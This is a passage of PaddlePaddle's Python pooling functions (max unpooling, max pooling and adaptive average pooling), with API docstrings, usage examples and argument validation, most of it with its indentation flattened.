return (squeeze(pool_out, [2]),
squeeze(mask, [2])) if return_mask else squeeze(pool_out, [2])
def _unpool_output_size(x, kernel_size, stride, padding, output_size):
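    """Compute the target spatial size of an unpooling op.
    For each pooled dimension the default size is
    (input_size - 1) * stride + kernel_size - 2 * padding.
    If ``output_size`` is given, a leading [N, C] pair is stripped when present,
    the remaining length must match ``kernel_size``, and every entry must lie
    strictly between default - stride and default + stride.
    """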
input_size = x.shape
default_size = []
for d in range(len(kernel_size)):
default_size.append((input_size[-len(kernel_size) + d] - 1) *
stride[d] + kernel_size[d] - 2 * padding[d])
if output_size is None:
ret = default_size
else:
if len(output_size) == len(kernel_size) + 2:
output_size = output_size[2:]
if len(output_size) != len(kernel_size):
raise ValueError(
"output_size should be a sequence containing "
"{} or {} elements, but it has a length of '{}'".format(
len(kernel_size),
len(kernel_size) + 2, len(output_size)))
for d in range(len(kernel_size)):
min_size = default_size[d] - stride[d]
max_size = default_size[d] + stride[d]
if not (min_size < output_size[d] < max_size):
raise ValueError(
'invalid output_size "{}" (dim {} must be between {} and {})'
.format(output_size, d, min_size, max_size))
ret = output_size
return ret
def max_unpool1d(x,
indices,
kernel_size,
stride=None,
padding=0,
data_format="NCL",
output_size=None,
name=None):
r"""
    This API implements max unpooling 1d operation.
`max_unpool1d` accepts the output of `max_pool1d` as input,
    including the indices of the maximum value, and calculates the partial inverse.
All non-maximum values are set to zero.
- Input: :math:`(N, C, L_{in})`
- Output: :math:`(N, C, L_{out})`, where
.. math::
L_{out} = (L_{in} - 1) * stride - 2 * padding + kernel\_size
or as given by :attr:`output_size` in the call operator.
Args:
x (Tensor): The input tensor of unpooling operator which is a 3-D tensor with
shape [N, C, L]. The format of input tensor is `"NCL"`,
where `N` is batch size, `C` is the number of channels, `L` is
the length of the feature. The data type is float32 or float64.
indices (Tensor): The indices given out by maxpooling1d which is a 3-D tensor with
shape [N, C, L]. The format of input tensor is `"NCL"` ,
where `N` is batch size, `C` is the number of channels, `L` is
            the length of the feature. The data type is float32 or float64.
kernel_size (int|list|tuple): The unpool kernel size. If unpool kernel size is a tuple or list,
it must contain an integer.
stride (int|list|tuple): The unpool stride size. If unpool stride size is a tuple or list,
it must contain an integer.
padding (int | tuple): Padding that was added to the input.
output_size(list|tuple, optional): The target output size. If output_size is not specified,
the actual output shape will be automatically calculated by (input_shape,
kernel_size, stride, padding).
data_format (string): The data format of the input and output data.
The default is `"NCL"`. When it is `"NCL"`, the data is stored in the order of:
`[batch_size, input_channels, input_length]`.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of unpooling result.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
data = paddle.rand(shape=[1, 3, 16])
pool_out, indices = F.max_pool1d(data, kernel_size=2, stride=2, padding=0, return_mask=True)
# pool_out shape: [1, 3, 8], indices shape: [1, 3, 8]
unpool_out = F.max_unpool1d(pool_out, indices, kernel_size=2, padding=0)
# unpool_out shape: [1, 3, 16]
"""
"""NCL to NCHW"""
if data_format not in ["NCL"]:
raise ValueError("Attr(data_format) should be 'NCL'. Received "
"Attr(data_format): %s." % str(data_format))
data_format = "NCHW"
x = unsqueeze(x, [2])
indices = unsqueeze(indices, [2])
kernel_size = [1] + utils.convert_to_list(kernel_size, 1, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = [1] + utils.convert_to_list(stride, 1, 'pool_stride')
padding, padding_algorithm = _update_padding_nd(padding, 1)
    # use 2d to implement 1d: the padding must be expanded in advance.
padding = _expand_low_nd_padding(padding)
output_size = _unpool_output_size(x, kernel_size, stride, padding,
output_size)
if in_dygraph_mode():
output = _C_ops.final_state_unpool(x, indices, kernel_size, stride,
padding, output_size, data_format)
return squeeze(output, [2])
elif in_dynamic_mode():
output = _C_ops.unpool(x, indices, 'unpooling_type', 'max', 'ksize',
kernel_size, 'strides', stride, 'paddings',
padding, "output_size", output_size,
"data_format", data_format)
return squeeze(output, [2])
op_type = "unpool"
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype(input_param_name="x")
unpool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type=op_type,
inputs={
"X": x,
"Indices": indices
},
outputs={"Out": unpool_out},
attrs={
"unpooling_type": "max",
"ksize": kernel_size,
"strides": stride,
"paddings": padding,
"output_size": output_size
})
return squeeze(unpool_out, [2])
def max_unpool2d(x,
indices,
kernel_size,
stride=None,
padding=0,
data_format="NCHW",
output_size=None,
name=None):
r"""
    This API implements max unpooling 2d operation.
See more details in :ref:`api_nn_pooling_MaxUnPool2D` .
Args:
x (Tensor): The input tensor of unpooling operator which is a 4-D tensor with
shape [N, C, H, W]. The format of input tensor is `"NCHW"`,
where `N` is batch size, `C` is the number of channels,
`H` is the height of the feature, and `W` is the width of the
            feature. The data type is float32 or float64.
indices (Tensor): The indices given out by maxpooling2d which is a 4-D tensor with
shape [N, C, H, W]. The format of input tensor is `"NCHW"` ,
where `N` is batch size, `C` is the number of channels,
`H` is the height of the feature, and `W` is the width of the
            feature. The data type is float32 or float64.
kernel_size (int|list|tuple): The unpool kernel size. If unpool kernel size is a tuple or list,
it must contain an integer.
stride (int|list|tuple): The unpool stride size. If unpool stride size is a tuple or list,
it must contain an integer.
padding (int | tuple): Padding that was added to the input.
output_size(list|tuple, optional): The target output size. If output_size is not specified,
the actual output shape will be automatically calculated by (input_shape,
            kernel_size, stride, padding).
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
- Input: :math:`(N, C, H_{in}, W_{in})`
- Output: :math:`(N, C, H_{out}, W_{out})`, where
.. math::
H_{out} = (H_{in} - 1) \times \text{stride[0]} - 2 \times \text{padding[0]} + \text{kernel\_size[0]}
.. math::
W_{out} = (W_{in} - 1) \times \text{stride[1]} - 2 \times \text{padding[1]} + \text{kernel\_size[1]}
or as given by :attr:`output_size` in the call operator
Returns:
Tensor: The output tensor of unpooling result.
Raises:
ValueError: If the input is not a 4-D tensor.
        ValueError: If indices shape is not equal to input shape.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
data = paddle.rand(shape=[1,1,6,6])
pool_out, indices = F.max_pool2d(data, kernel_size=2, stride=2, padding=0, return_mask=True)
# pool_out shape: [1, 1, 3, 3], indices shape: [1, 1, 3, 3]
unpool_out = F.max_unpool2d(pool_out, indices, kernel_size=2, padding=0)
# unpool_out shape: [1, 1, 6, 6]
# specify a different output size than input size
unpool_out = F.max_unpool2d(pool_out, indices, kernel_size=2, padding=0, output_size=[7,7])
# unpool_out shape: [1, 1, 7, 7]
"""
kernel_size = utils.convert_to_list(kernel_size, 2, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 2, 'pool_stride')
padding = utils.convert_to_list(padding, 2, 'padding')
if data_format not in ["NCHW"]:
raise ValueError("Attr(data_format) should be 'NCHW'. Received "
"Attr(data_format): %s." % str(data_format))
output_size = _unpool_output_size(x, kernel_size, stride, padding,
output_size)
if in_dygraph_mode():
output = _C_ops.final_state_unpool(x, indices, kernel_size, stride,
padding, output_size, data_format)
elif in_dynamic_mode():
output = _C_ops.unpool(x, indices, 'unpooling_type', 'max', 'ksize',
kernel_size, 'strides', stride, 'paddings',
padding, "output_size", output_size,
"data_format", data_format)
return output
op_type = "unpool"
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype(input_param_name="x")
unpool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type=op_type,
inputs={
"X": x,
"Indices": indices
},
outputs={"Out": unpool_out},
attrs={
"unpooling_type": "max",
"ksize": kernel_size,
"strides": stride,
"paddings": padding,
"output_size": output_size
})
return unpool_out
def max_unpool3d(x,
indices,
kernel_size,
stride=None,
padding=0,
data_format="NCDHW",
output_size=None,
name=None):
r"""
    This API implements max unpooling 3d operation.
`max_unpool3d` accepts the output of `max_pool3d` as input,
    including the indices of the maximum value, and calculates the partial inverse.
All non-maximum values are set to zero.
- Input: :math:`(N, C, D_{in}, H_{in}, W_{in})`
- Output: :math:`(N, C, D_{out}, H_{out}, W_{out})`, where
.. math::
D_{out} = (D_{in} - 1) * stride[0] - 2 * padding[0] + kernel\_size[0]
.. math::
H_{out} = (H_{in} - 1) * stride[1] - 2 * padding[1] + kernel\_size[1]
.. math::
W_{out} = (W_{in} - 1) * stride[2] - 2 * padding[2] + kernel\_size[2]
or as given by :attr:`output_size` in the call operator
Args:
x (Tensor): The input tensor of unpooling operator which is a 5-D tensor with
shape [N, C, D, H, W]. The format of input tensor is `"NCDHW"`,
where `N` is batch size, `C` is the number of channels, `D` is
the depth of the feature, `H` is the height of the feature,
and `W` is the width of the feature. The data type is float32 or float64.
indices (Tensor): The indices given out by maxpooling3d which is a 5-D tensor with
shape [N, C, D, H, W]. The format of input tensor is `"NCDHW"` ,
where `N` is batch size, `C` is the number of channels, `D` is
the depth of the feature, `H` is the height of the feature,
and `W` is the width of the feature. The data type is float32 or float64.
kernel_size (int|list|tuple): The unpool kernel size. If unpool kernel size is a tuple or list,
it must contain an integer.
stride (int|list|tuple): The unpool stride size. If unpool stride size is a tuple or list,
it must contain an integer.
padding (int | tuple): Padding that was added to the input.
output_size(list|tuple, optional): The target output size. If output_size is not specified,
the actual output shape will be automatically calculated by (input_shape,
kernel_size, stride, padding).
data_format (string): The data format of the input and output data.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of unpooling result.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
data = paddle.rand(shape=[1, 1, 4, 4, 6])
pool_out, indices = F.max_pool3d(data, kernel_size=2, stride=2, padding=0, return_mask=True)
# pool_out shape: [1, 1, 2, 2, 3], indices shape: [1, 1, 2, 2, 3]
unpool_out = F.max_unpool3d(pool_out, indices, kernel_size=2, padding=0)
# unpool_out shape: [1, 1, 4, 4, 6]
"""
kernel_size = utils.convert_to_list(kernel_size, 3, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 3, 'pool_stride')
padding = utils.convert_to_list(padding, 3, 'padding')
if data_format not in ["NCDHW"]:
raise ValueError("Attr(data_format) should be 'NCDHW'. Received "
"Attr(data_format): %s." % str(data_format))
output_size = _unpool_output_size(x, kernel_size, stride, padding,
output_size)
if in_dygraph_mode():
output = _C_ops.final_state_unpool3d(x, indices, kernel_size, stride,
padding, output_size, data_format)
elif in_dynamic_mode():
output = _C_ops.unpool3d(x, indices, 'unpooling_type', 'max', 'ksize',
kernel_size, 'strides', stride, 'paddings',
padding, "output_size", output_size,
"data_format", data_format)
return output
op_type = "unpool3d"
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype(input_param_name="x")
unpool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type=op_type,
inputs={
"X": x,
"Indices": indices
},
outputs={"Out": unpool_out},
attrs={
"unpooling_type": "max",
"ksize": kernel_size,
"strides": stride,
"paddings": padding,
"output_size": output_size
})
return unpool_out
def max_pool2d(x,
kernel_size,
stride=None,
padding=0,
return_mask=False,
ceil_mode=False,
data_format="NCHW",
name=None):
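    """
    This API implements max pooling 2d operation.
    Args:
        x (Tensor): The input tensor of pooling operator which is a 4-D tensor with
            shape [N, C, H, W]. The format of input tensor is `"NCHW"` or `"NHWC"`,
            where `N` is batch size, `C` is the number of channels, `H` is the height
            of the feature, and `W` is the width of the feature. The data type can be
            float16, float32 or float64.
        kernel_size (int|list|tuple): The pool kernel size. If the kernel size is a tuple
            or list, it must contain two integers, (kernel_size_Height, kernel_size_Width).
            Otherwise, the pool kernel size will be a square of an int.
        stride (int|list|tuple): The pool stride size. If the stride size is a tuple or list,
            it must contain two integers, (stride_Height, stride_Width). Otherwise, the
            stride size will be a square of an int. Default None, which means it equals kernel_size.
        padding (string|int|list|tuple): The padding size, in the same forms accepted by
            avg_pool2d. The default value is 0.
        return_mask (bool): Whether to return the max indices along with the outputs.
            Default False. Only supported when data_format is "NCHW".
        ceil_mode (bool): When True, will use `ceil` instead of `floor` to compute the
            output shape. Default False.
        data_format (string): The data format of the input and output data. An optional
            string from: `"NCHW"`, `"NHWC"`. The default is `"NCHW"`.
        name(str, optional): For detailed information, please refer
            to :ref:`api_guide_Name`. Usually name is no need to set and
            None by default.
    Returns:
        Tensor: The output tensor of pooling result. The data type is same as input tensor.
    Examples:
        .. code-block:: python
            import paddle
            import paddle.nn.functional as F
            # max pool2d
            x = paddle.uniform([1, 3, 32, 32])
            output = F.max_pool2d(x, kernel_size=2, stride=2, padding=0)
            # output.shape [1, 3, 16, 16]
            # for return_mask=True
            output, max_indices = F.max_pool2d(x, kernel_size=2, stride=2, padding=0,
                                               return_mask=True)
            # output.shape [1, 3, 16, 16], max_indices.shape [1, 3, 16, 16]
    """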
kernel_size = utils.convert_to_list(kernel_size, 2, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 2, 'pool_stride')
if data_format not in ["NCHW", "NHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCHW' or 'NHWC'. Received "
"Attr(data_format): %s." % str(data_format))
channel_last = True if data_format == "NHWC" else False
padding, padding_algorithm = _update_padding_nd(padding,
num_dims=2,
channel_last=channel_last,
ceil_mode=ceil_mode)
if data_format == "NHWC" and return_mask:
raise ValueError(
"When setting return_mask to true, data_format must be set to NCHW in API:max_pool2d"
)
if in_dygraph_mode():
if return_mask:
output = _C_ops.final_state_max_pool2d_with_index(
x, kernel_size, stride, padding, False, False)
return output if return_mask else output[0]
else:
return _C_ops.final_state_pool2d(x, kernel_size, stride, padding,
ceil_mode, True, data_format,
'max', False, False,
padding_algorithm)
if _in_legacy_dygraph():
if return_mask:
output = _C_ops.max_pool2d_with_index(
x, 'ksize', kernel_size, 'global_pooling', False, 'strides',
stride, 'paddings', padding, 'padding_algorithm',
padding_algorithm, 'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', True, 'data_format',
data_format)
return output if return_mask else output[0]
else:
output = _C_ops.pool2d(x, 'pooling_type', 'max', 'ksize',
kernel_size, 'global_pooling', False,
'padding_algorithm', padding_algorithm,
'strides', stride, 'paddings', padding,
'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', True,
'data_format', data_format)
return output
op_type = 'max_pool2d_with_index' if return_mask else "pool2d"
helper = LayerHelper(op_type, **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'max_pool2d')
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference("int32")
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=op_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'max',
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": True,
"data_format": data_format,
})
return (pool_out, mask) if return_mask else pool_out
def max_pool3d(x,
kernel_size,
stride=None,
padding=0,
return_mask=False,
ceil_mode=False,
data_format="NCDHW",
name=None):
"""
    This API implements max pooling 3d operation.
See more details in :ref:`api_nn_pooling_MaxPool3d` .
Args:
x (Tensor): The input tensor of pooling operator, which is a 5-D tensor with
shape [N, C, D, H, W]. The format of input tensor is `"NCDHW"` or `"NDHWC"`, where N represents batch size, C represents the number of channels, D, H and W represent the depth, height and width of the feature respectively.
kernel_size (int|list|tuple): The pool kernel size. If the kernel size
is a tuple or list, it must contain three integers,
(kernel_size_Depth, kernel_size_Height, kernel_size_Width).
Otherwise, the pool kernel size will be the cube of an int.
stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
            it must contain three integers, (stride_Depth, stride_Height, stride_Width).
Otherwise, the pool stride size will be a cube of an int.
padding (string|int|list|tuple): The padding size. Padding could be in one of the following forms.
1. A string in ['valid', 'same'].
            2. An int, which means the feature map is zero padded by size of `padding` on every side.
            3. A list[int] or tuple(int) whose length is 3, [pad_depth, pad_height, pad_width] whose value means the padding size of each dimension.
4. A list[int] or tuple(int) whose length is 6. [pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right] whose value means the padding size of each side.
5. A list or tuple of pairs of integers. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension should be [0,0] or (0,0).
The default value is 0.
ceil_mode (bool): ${ceil_mode_comment}
        return_mask (bool): Whether to return the max indices along with the outputs. Default False. Only supported when data_format is "NCDHW".
data_format (string): The data format of the input and output data. An optional string from: `"NCDHW"`, `"NDHWC"`.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is "VALID", but `ceil_mode` is True.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
# max pool3d
x = paddle.uniform([1, 3, 32, 32, 32])
output = F.max_pool3d(x,
kernel_size=2,
stride=2, padding=0)
# output.shape [1, 3, 16, 16, 16]
# for return_mask=True
x = paddle.uniform([1, 3, 32, 32, 32])
output, max_indices = paddle.nn.functional.max_pool3d(x,
kernel_size = 2,
stride = 2,
padding=0,
return_mask=True)
# output.shape [1, 3, 16, 16, 16], max_indices.shape [1, 3, 16, 16, 16]
"""
kernel_size = utils.convert_to_list(kernel_size, 3, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 3, 'pool_stride')
channel_last = _channel_last(data_format, 3)
padding, padding_algorithm = _update_padding_nd(padding,
3,
channel_last=channel_last,
ceil_mode=ceil_mode)
if data_format == "NDHWC" and return_mask:
raise ValueError(
"When setting return_mask to true, data_format must be set to NCDHW in API:max_pool3d"
)
if in_dygraph_mode():
if return_mask:
output = _C_ops.final_state_max_pool3d_with_index(
x, kernel_size, stride, padding, False, False)
return output if return_mask else output[0]
else:
return _C_ops.final_state_pool3d(x, kernel_size, stride, padding,
ceil_mode, True, data_format,
'max', False, False,
padding_algorithm)
if _in_legacy_dygraph():
if return_mask:
output = _C_ops.max_pool3d_with_index(
x, 'pooling_type', 'max', 'ksize', kernel_size, 'strides',
stride, 'paddings', padding, 'global_pooling', False,
'padding_algorithm', padding_algorithm, 'use_cudnn', True,
'ceil_mode', ceil_mode, 'use_mkldnn', False, 'exclusive', True,
'data_format', data_format)
return output if return_mask else output[0]
else:
output = _C_ops.pool3d(x, 'pooling_type', 'max', 'ksize',
kernel_size, 'global_pooling', False,
'padding_algorithm', padding_algorithm,
'strides', stride, 'paddings', padding,
'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', True,
'data_format', data_format)
return output
op_type = "max_pool3d_with_index" if return_mask else "pool3d"
helper = LayerHelper(op_type, **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'max_pool3d')
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference('int32')
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=op_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'max',
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": False,
"data_format": data_format,
})
return (pool_out, mask) if return_mask else pool_out
def adaptive_avg_pool1d(x, output_size, name=None):
"""
Adaptive average pooling 1d operation on :attr:`x` according to :attr:`output_size`.
Notes:
See more details in :ref:`api_nn_pooling_AdaptiveAvgPool1d` .
Args:
x (Tensor): The input Tensor of pooling, which is a 3-D tensor with shape :math:`[N, C, L]`, where :math:`N` is batch size, :math:`C` is the number of channels and :math:`L` is the length of the feature. The data type is float32 or float64.
output_size (int): The target output size. Its data type must be int.
name (str, optional): For details, please refer to :ref:`api_guide_Name`. Generally, no setting is required. Default: None.
Returns:
Tensor: The result of 1D adaptive average pooling. Its data type is same as input.
Examples:
.. code-block:: python
# average adaptive pool1d
# suppose input data in shape of [N, C, L], `output_size` is m or [m],
            # output shape is [N, C, m], adaptive pool divides the L dimension
            # of input data into m grids evenly and performs pooling in each
            # grid to get the output.
            # adaptive avg pool performs calculations as follows:
            #
            # for i in range(m):
            #     lstart = floor(i * L / m)
            #     lend = ceil((i + 1) * L / m)
            #     output[:, :, i] = sum(input[:, :, lstart: lend]) / (lend - lstart)
#
import paddle
import paddle.nn.functional as F
data = paddle.uniform([1, 3, 32])
pool_out = F.adaptive_avg_pool1d(data, output_size=16)
# pool_out shape: [1, 3, 16])
"""
pool_type = 'avg'
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
                                 'adaptive_avg_pool1d')
check_type(output_size, 'pool_size', (int), 'adaptive_pool1d')
_check_input(x, 3)
pool_size = [1] + utils.convert_to_list(output_size, 1, 'pool_size')
x = unsqueeze(x, [2])
if in_dynamic_mode():
pool_out = _C_ops.pool2d(x, 'pooling_type', pool_type, 'ksize',
pool_size, 'adaptive', True)
return squeeze(pool_out, [2])
l_type = "pool2d"
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"adaptive": True,
})
return squeeze(pool_out, [2])
def adaptive_avg_pool2d(x, output_size, data_format='NCHW', name=None):
"""
This API implements adaptive average pooling 2d operation.
See more details in :ref:`api_nn_pooling_AdaptiveAvgPool2d` .
Args:
x (Tensor): The input tensor of adaptive avg pool2d operator, which is a 4-D tensor.
The data type can be float32 or float64.
output_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
            it must contain two elements, (H, W). H and W can be either an int, or None which means
the size will be the same as that of the input.
data_format (str): The data format of the input and output data. An optional string
from: "NCHW", "NHWC". The default is "NCHW". When it is "NCHW", the data is stored in
the order of: [batch_size, input_channels, input_height, input_width].
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of avg adaptive pool2d result. The data type is same as input tensor.
Raises:
ValueError: If `data_format` is not "NCHW" or "NHWC".
Examples:
.. code-block:: python
# adaptive avg pool2d
# suppose input data in shape of [N, C, H, W], `output_size` is [m, n],
            # output shape is [N, C, m, n], adaptive pool divides H and W dimensions
            # of input data into m * n grids evenly and performs pooling in each
            # grid to get the output.
            # adaptive avg pool performs calculations as follows:
            #
            # for i in range(m):
            #     for j in range(n):
            #         hstart = floor(i * H / m)
            #         hend = ceil((i + 1) * H / m)
            #         wstart = floor(j * W / n)
            #         wend = ceil((j + 1) * W / n)
# output[:, :, i, j] = avg(input[:, :, hstart: hend, wstart: wend])
#
import paddle
import numpy as np
input_data = np.random.rand(2, 3, 32, 32)
x = paddle.to_tensor(input_data)
# x.shape is [2, 3, 32, 32]
out = paddle.nn.functional.adaptive_avg_pool2d(
x = x,
output_size=[3, 3])
# out.shape is [2, 3, 3, 3]
"""
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'adaptive_avg_pool2d')
check_type(data_format, 'data_format', str, 'adaptive_avg_pool2d')
if data_format not in ["NCHW", "NHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCHW' or 'NHWC'. Received "
"Attr(data_format): %s." % str(data_format))
if data_format == "NCHW":
in_h, in_w = x.shape[2:4]
else:
in_h, in_w = x.shape[1:3]
if isinstance(output_size, int):
output_size = utils.convert_to_list(output_size, 2, 'output_size')
else:
output_size = list(output_size)
if output_size[0] == None:
output_size[0] = in_h
if output_size[1] == None:
output_size[1] = in_w
if in_dygraph_mode():
return _C_ops.final_state_pool2d_gpudnn_unused(x, output_size, [1, 1],
[0, 0], False, True,
data_format, 'avg',
False, True, "EXPLICIT")
if _in_legacy_dygraph():
return _C_ops.pool2d(x, 'pooling_type', 'avg', 'ksize', output_size,
'global_pooling', False, 'adaptive', True,
'data_format', data_format)
l_type = 'pool2d'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": "avg",
"ksize": output_size,
"adaptive": True,
"data_format": data_format,
})
return pool_out
def adaptive_avg_pool3d(x, output_size, data_format='NCDHW', name=None):
"""
This API implements adaptive average pooling 3d operation.
See more details in :ref:`api_nn_pooling_AdaptiveAvgPool3d` .
Args:
x (Tensor): The input tensor of adaptive avg pool3d operator, which is a 5-D tensor.
The data type can be float32, float64.
output_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
            it must contain three elements, (D, H, W). D, H and W can be either an int, or None which means
the size will be the same as that of the input.
data_format (str): The data format of the input and output data. An optional string
from: "NCDHW", "NDHWC". The default is "NCDHW". When it is "NCDHW", the data is stored in
the order of: [batch_size, input_channels, input_depth, input_height, input_width].
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of avg adaptive pool3d result. The data type is same as input tensor.
Raises:
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
Examples:
.. code-block:: python
# adaptive avg pool3d
# suppose input data in shape of [N, C, D, H, W], `output_size` is [l, m, n],
            # output shape is [N, C, l, m, n], adaptive pool divides D, H and W dimensions
            # of input data into l * m * n grids evenly and performs pooling in each
            # grid to get the output.
            # adaptive avg pool performs calculations as follows:
#
# for i in range(l):
# for j in range(m):
# for k in range(n):
# dstart = floor(i * D / l)
# dend = ceil((i + 1) * D / l)
# hstart = floor(j * H / m)
# hend = ceil((j + 1) * H / m)
# wstart = floor(k * W / n)
# wend = ceil((k + 1) * W / n)
# output[:, :, i, j, k] =
# avg(input[:, :, dstart:dend, hstart: hend, wstart: wend])
import paddle
import numpy as np
input_data = np.random.rand(2, 3, 8, 32, 32)
x = paddle.to_tensor(input_data)
# x.shape is [2, 3, 8, 32, 32]
out = paddle.nn.functional.adaptive_avg_pool3d(
x = x,
output_size=[3, 3, 3])
# out.shape is [2, 3, 3, 3, 3]
"""
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'],
'adaptive_avg_pool3d')
check_type(data_format, 'data_format', str, 'adaptive_avg_pool3d')
if data_format not in ["NCDHW", "NDHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received "
"Attr(data_format): %s." % str(data_format))
if data_format == "NCDHW":
in_l, in_h, in_w = x.shape[2:5]
else:
in_l, in_h, in_w = x.shape[1:4]
if isinstance(output_size, int):
output_size = utils.convert_to_list(output_size, 3, 'output_size')
else:
output_size = list(output_size)
if output_size[0] == None:
output_size[0] = in_l
if output_size[1] == None:
output_size[1] = in_h
if output_size[2] == None:
output_size[2] = in_w
if in_dynamic_mode():
return _C_ops.pool3d(x, 'pooling_type', 'avg', 'ksize', output_size,
'global_pooling', False, 'adaptive', True,
'data_format', data_format)
l_type = 'pool3d'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": "avg",
"ksize": output_size,
"adaptive": True,
"data_format": data_format,
})
return pool_out
def adaptive_max_pool1d(x, output_size, return_mask=False, name=None):
"""
This API implements adaptive max pooling 1d operation.
See more details in :ref:`api_nn_pooling_AdaptiveMaxPool1d` .
Args:
x (Tensor): The input tensor of pooling operator, which is a 3-D tensor
with shape [N, C, L]. The format of input tensor is NCL,
where N is batch size, C is the number of channels, L is the
length of the feature. The data type is float32 or float64.
output_size (int): The pool kernel size. The value should be an integer.
return_mask (bool): If true, the index of max pooling point will be returned along
with outputs. It cannot be set in average pooling type. Default False.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of adaptive pooling result. The data type is same
as input tensor.
Raises:
ValueError: 'output_size' should be an integer.
Examples:
.. code-block:: python
# max adaptive pool1d
# suppose input data in shape of [N, C, L], `output_size` is m or [m],
            # output shape is [N, C, m], adaptive pool divides the L dimension
            # of input data into m grids evenly and performs pooling in each
            # grid to get the output.
            # adaptive max pool performs calculations as follows:
#
# for i in range(m):
# lstart = floor(i * L / m)
# lend = ceil((i + 1) * L / m)
# output[:, :, i] = max(input[:, :, lstart: lend])
#
import paddle
import paddle.nn.functional as F
import numpy as np
data = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32]).astype(np.float32))
pool_out = F.adaptive_max_pool1d(data, output_size=16)
# pool_out shape: [1, 3, 16])
pool_out, indices = F.adaptive_max_pool1d(data, output_size=16, return_mask=True)
# pool_out shape: [1, 3, 16] indices shape: [1, 3, 16]
"""
pool_type = 'max'
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'],
'adaptive_max_pool1d')
check_type(output_size, 'pool_size', int, 'adaptive_max_pool1d')
check_type(return_mask, 'return_mask', bool, 'adaptive_max_pool1d')
